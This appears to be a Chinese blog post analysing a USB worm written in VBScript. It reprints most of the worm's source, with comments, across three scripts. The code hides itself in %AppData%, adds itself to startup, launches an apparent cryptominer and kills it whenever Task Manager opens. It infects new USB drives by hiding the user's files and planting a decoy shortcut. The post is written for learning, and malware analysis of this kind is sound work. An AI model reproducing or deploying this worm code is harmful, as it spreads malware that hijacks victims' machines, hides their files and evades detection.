一个常见U盘病毒的源码解读
2018-03-02 21:44
423 查看
目录
目录现象
源代码解读
1 快捷方式文件
2 movemenoreg vbs文件
3 helper vbs文件
4 installer vbs文件
工作流程
1 从U盘感染电脑
2 从电脑感染U盘
总结
1. 现象
该病毒会在感染的U盘的根目录下建立两个隐藏目录和一个快捷方式文件,其中两个隐藏目录的名称分别为“-”和“WindowsServices”。在名为“-”的目录下存放着用户原来U盘里面的所有文件,在名为“WindowsServices”的目录下存放着三个病毒文件,文件名为:movemenoreg.vbs,
installer.vbs,
helper.vbs。(从源代码里发现,其实是有四个文件,还有一个文件名为
WindowsServices.exe,只是我的U盘里面没有这个文件)。快捷方式文件名与用户的U盘名称相同。
2. 源代码解读
2.1 快捷方式文件
快捷方式文件是只一个入口,用来误导用户点击,以启动病毒的主体文件。快捷方式的目标如下:%COMSPEC% /C .\WindowsServices\movemenoreg.vbs
其中,
%COMSPEC%是环境变量,指的是
C:\Windows\system32\cmd.exe。这里是用
cmd.exe打开病毒文件
movemenoreg.vbs。
2.2 movemenoreg .vbs文件
'发生错误时,程序继续执行下一句代码
on error resume next
'定义一系统变量
Dim strPath, objws, objFile, strFolder, Target, destFolder, objDestFolder, AppData, ws, objmove, pfolder, objWinMgmt, colProcess, vaprocess
'获得WScript.Shell
Set ws = WScript.CreateObject("WScript.Shell")
Target = "\WindowsServices"
'打开根目录下名为‘-’的目录,也就是真正存放用户所有文件的目录
strPath = WScript.ScriptFullName
set objws = CreateObject("Scripting.FileSystemObject")
Set objFile = objws.GetFile(strPath)
strFolder = objws.GetParentFolderName(objFile)
pfolder = objws.GetParentFolderName(strFolder)
'Chr(34)是双引号
ws.Run Chr(34) & pfolder & "\_" & Chr(34)
AppData = ws.ExpandEnvironmentStrings("%AppData%")
DestFolder = AppData & Target
'创建目标目录,也就是%AppData%\WindowsServices目录
if (not objws.folderexists(DestFolder)) then
objws.CreateFolder DestFolder
Set objDestFolder = objws.GetFolder(DestFolder)
end if
'将四个病毒文件复制到目标目录并隐藏,再将目标目录隐藏
Call moveandhide ("\helper.vbs")
Call moveandhide ("\installer.vbs")
Call moveandhide ("\movemenoreg.vbs")
Call moveandhide ("\WindowsServices.exe")
objDestFolder.Attributes = objDestFolder.Attributes + 39
sub moveandhide (name)
if (not objws.fileexists(DestFolder & name)) then
'复制文件
objws.CopyFile strFolder & name, DestFolder & "\"
Set objmove = objws.GetFile(DestFolder & name)
'隐藏文件(39表示文件属性为归档、系统、隐藏)
If not objmove.Attributes AND 39 then
objmove.Attributes = 0
objmove.Attributes = objmove.Attributes + 39
end if
end if
end sub
Set objWinMgmt = GetObject("WinMgmts:Root\Cimv2")
Set colProcess = objWinMgmt.ExecQuery ("Select * From Win32_Process where name = 'wscript.exe'")
'从任务管理器中查找helper.vbs是否已经运行,如果已经运行则退出当前脚本
For Each objProcess In colProcess
vaprocess = objProcess.CommandLine
if instr(vaprocess, "helper.vbs") then
WScript.quit
End if
Next
'运行helper.vbs
ws.Run Chr(34) & DestFolder & "\helper.vbs" & Chr(34)
Set ws = Nothing2.3 helper .vbs文件
on error resume next
Dim ws, strPath, objws, objFile, strFolder, startupPath, MyScript, objWinMgmt, colProcess, vaprocess, miner, tskProcess, nkey, key
Set ws = WScript.CreateObject("WScript.Shell")
nkey = "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\StartupFolder\helper.lnk"
Set objWinMgmt = GetObject("WinMgmts:Root\Cimv2")
strPath = WScript.ScriptFullName
set objws = CreateObject("Scripting.FileSystemObject")
Set objFile = objws.GetFile(strPath)
strFolder = objws.GetParentFolderName(objFile)
strPath = strFolder & "\"
'获得用户启动目录的路径
startupPath = ws.SpecialFolders("startup")
miner = Chr(34) & strPath & "WindowsServices.exe" & Chr(34)
MyScript = "helper.vbs"
While True
'检查注册表是否已经修改,如果没有,则修改注册表启动项
key = Empty
key = ws.regread (nkey)
If (not IsEmpty(key)) then
ws.RegWrite nkey, 2, "REG_BINARY"
End if
If (not objws.fileexists(startupPath & "\helper.lnk")) then
'在启动目录创建helper.vbs的启动快捷方式
Set link = ws.CreateShortcut(startupPath & "\helper.lnk")
link.Description = "helper"
link.TargetPath =chr(34) & strPath & "helper.vbs" & chr(34)
link.WorkingDirectory = strPath
link.Save
End If
Set colProcess = objWinMgmt.ExecQuery ("Select * From Win32_Process where name = 'wscript.exe'")
'检查installer.vbs文件是否在执行,如果不在则运行installer.vbs
call procheck(colProcess, "installer.vbs")
Set colProcess = objWinMgmt.ExecQuery ("Select * From Win32_Process where name Like '%WindowsServices.exe%'")
Set tskProcess = objWinMgmt.ExecQuery ("Select * From Win32_Process where name Like '%Taskmgr.exe%'")
if colProcess.count = 0 And tskProcess.count = 0 then
'运行WindowsServices.exe
ws.Run miner, 0
ElseIf colProcess.count > 0 And tskProcess.count > 0 then
'如果用户打开了任务管理器,则杀掉WindowsServices.exe
For Each objProcess In colProcess
ws.run "taskkill /PID " & objProcess.ProcessId , 0
Next
end if
WScript.Sleep 3000
Wend
'---------------------------------------------------------------------------------
sub procheck(checkme, procname)
For Each objProcess In checkme
vaprocess = objProcess.CommandLine
if instr(vaprocess, procname) then
Exit sub
End if
Next
ws.Run Chr(34) & strPath & procname & Chr(34)
end sub
'--------------------------------------------------------------------------------2.4 installer .vbs文件
整个installer.vbs文件主要起感染新U盘的作用。on error resume next
DIM colEvents, objws, strComputer, objEvent, DestFolder, strFolder, Target, ws, objFile, objWMIService, DummyFolder, check, number, home, device, devicename, colProcess, vaprocess, ob
ecfc
jWinMgmt
strComputer = "."
Set ws = WScript.CreateObject("WScript.Shell")
Target = "\WindowsServices"
'where are we?
strPath = WScript.ScriptFullName
set objws = CreateObject("Scripting.FileSystemObject")
Set objFile = objws.GetFile(strPath)
strFolder = objws.GetParentFolderName(objFile)
'Checking for USB instance
Set objWMIService = GetObject("winmgmts:\\" & strComputer & "\root\cimv2")
'查询硬盘事件
Set colEvents = objWMIService.ExecNotificationQuery ("SELECT * FROM __InstanceOperationEvent WITHIN 1 WHERE " & "TargetInstance ISA 'Win32_LogicalDisk'")
Set objWinMgmt = GetObject("WinMgmts:Root\Cimv2")
While True
'检查helper.vbs是否在执行,如果不在执行,则运行help.vbs
Set colProcess = objWinMgmt.ExecQuery ("Select * From Win32_Process where name = 'wscript.exe'")
call procheck(colProcess, "helper.vbs")
'取出下一个事件
Set objEvent = colEvents.NextEvent
If objEvent.TargetInstance.DriveType = 2 Then
If objEvent.Path_.Class = "__InstanceCreationEvent" Then
'一个新的U盘插入
device = objEvent.TargetInstance.DeviceID
devicename = objEvent.TargetInstance.VolumeName
DestFolder = device & "\WindowsServices"
DummyFolder = device & "\" & "_"
'在U盘根目录下创建目的目录(\WindowsServices)
if (not objws.folderexists(DestFolder)) then
objws.CreateFolder DestFolder
Set objDestFolder = objws.GetFolder(DestFolder)
objDestFolder.Attributes = objDestFolder.Attributes + 39
end if
'将四个病毒文件移动到目的目录
Call moveandhide ("\helper.vbs")
Call moveandhide ("\installer.vbs")
Call moveandhide ("\movemenoreg.vbs")
Call moveandhide ("\WindowsServices.exe")
'在U盘根目录下创建打开movemenoreg.vbs文件的快捷方式
if (not objws.fileexists (device & devicename & ".lnk")) then
Set link = ws.CreateShortcut(device & "\" & devicename & ".lnk")
link.IconLocation = "%windir%\system32\SHELL32.dll, 7"
link.TargetPath = "%COMSPEC%"
link.Arguments = "/C .\WindowsServices\movemenoreg.vbs"
link.windowstyle = 7
link.Save
End If
'在U盘根目录下创建名为‘-’的目录并隐藏
if (not objws.folderexists(DummyFolder)) then
objws.CreateFolder DummyFolder
Set objDestFolder = objws.GetFolder(DummyFolder)
objDestFolder.Attributes = objDestFolder.Attributes + 2 + 4
End If
set check = objws.getFolder(device)
'将用户文件都移动到名为‘-’的目录下
Call checker(check)
End If
End If
Wend
sub checker (path)
set home = path.Files
For Each file in home
Select Case file.Name
Case devicename & ".lnk"
'nothings
Case Else
objws.MoveFile path & file.Name, DummyFolder & "\"
End Select
Next
set home = path.SubFolders
For Each home in home
Select Case home
Case path & "_"
'nothings
Case path & "WindowsServices"
'nothings
Case path & "System Volume Information"
'nothings'
Case Else
objws. MoveFolder home, DummyFolder & "\"
End Select
Next
end sub
'------------------------------------------------------------
sub moveandhide (name)
if (not objws.fileexists(DestFolder & name)) then
objws.CopyFile strFolder & name, DestFolder & "\"
Set objmove = objws.GetFile(DestFolder & name)
If not objmove.Attributes AND 39 then
objmove.Attributes = 0
objmove.Attributes = objmove.Attributes + 39
end if
end if
end sub
'------------------------------------------------------------
sub procheck(checkme, procname)
For Each objProcess In checkme
vaprocess = objProcess.CommandLine
if instr(vaprocess, procname) then
Exit sub
End if
Next
ws.Run Chr(34) & strFolder & "\" & procname & Chr(34)
end sub3. 工作流程
3.1 从U盘感染电脑
一个感染后的U盘–》用户点击U盘根目录下的快捷方式–》病毒将自己复制到%AppData%\WindowsServices目录下,并将自己添加到开机启动项,时刻查询新U盘的插入,一旦有新U盘插入,马上病毒文件复制到新U盘
3.2 从电脑感染U盘
一台受感染的电脑–》U盘病毒随电脑开机启动–》病毒检查到新U盘插入–》病毒在新U盘的根目录下建立“-”和“WindowsServices”目录,将用户原有的所有文件复制到“-”目录下,将四个病毒代码文件复制到“WindowsServices”目录下,在U盘根目录下建立打开病毒文件movemenoreg.vbs的快捷方式
4. 总结
“麻雀虽小,五脏俱全”,该病毒虽然只有三百行不到的代码,但是感染宿主,寻找新宿主以及反查杀能力都具备了;代码中变量的命名、功能的划分都比较合理,可以看出制作病毒的这位前辈对于vbs的编程以及病毒的编写比较熟练;
由于缺失病毒文件
WindowsServices.exe,我们无法得知这位前辈真正的目的是什么,但是,从
helper.vbs的
miner = Chr(34) & strPath & "WindowsServices.exe" & Chr(34)这一句命令中,我们可以推测出它大概是一个挖矿程序。
郑重声明:本文对该病毒源代码进行分析,只为学习和传播知识使用,一切后果与本文作者无关!
内容来自用户分享和网络整理,不保证内容的准确性,如有侵权内容,可联系管理员处理 
相关文章推荐
- 一个程序破解多个验证码之源码解读[附源码]
- QVariant相当于一个包含大多数Qt数据类型的联合体(源码解读)
- Java6集合类源码解读-----ArrayList中一个有趣的变量oldData
- 如何判断一个Http Message的结束——python源码解读
- 一个JavaScript Title、alt提示(Tips)源码解读
- 如何判断一个Http Message的结束——python源码解读
- HashMap源码的解读-为何存取的性能很高的一个重要点
- Vue源码解读——实现一个双向绑定(Object.defineProperty与observe)
- 一个便签项目的源码解读
- java集合之ArrayList源码解读 帮助大家自己动手写一个ArrayList
- Java8 HashMap源码解读时的一个迷惑
- 一个U盘病毒汇编源码分析
- react-redux-router 一个完整项目解读(附源码)
- 解读QT信号与槽机制里 QMetaObject::connectSlotsByName(QObject *o)的源码 介绍 connectSlotsByName 是一个QMetaObject类里的
- Caffe源码解读(十一):自定义一个layer
- JVM源码分析之FinalReference完全解读
- spring 源码解读与设计详解: 7 BeanDefinitionParserDelegate深入解读
- Apache Beam WordCount编程实战及源码解读
- 源码级别解读 mybatis 插件
- 用C写的一个扫描器源码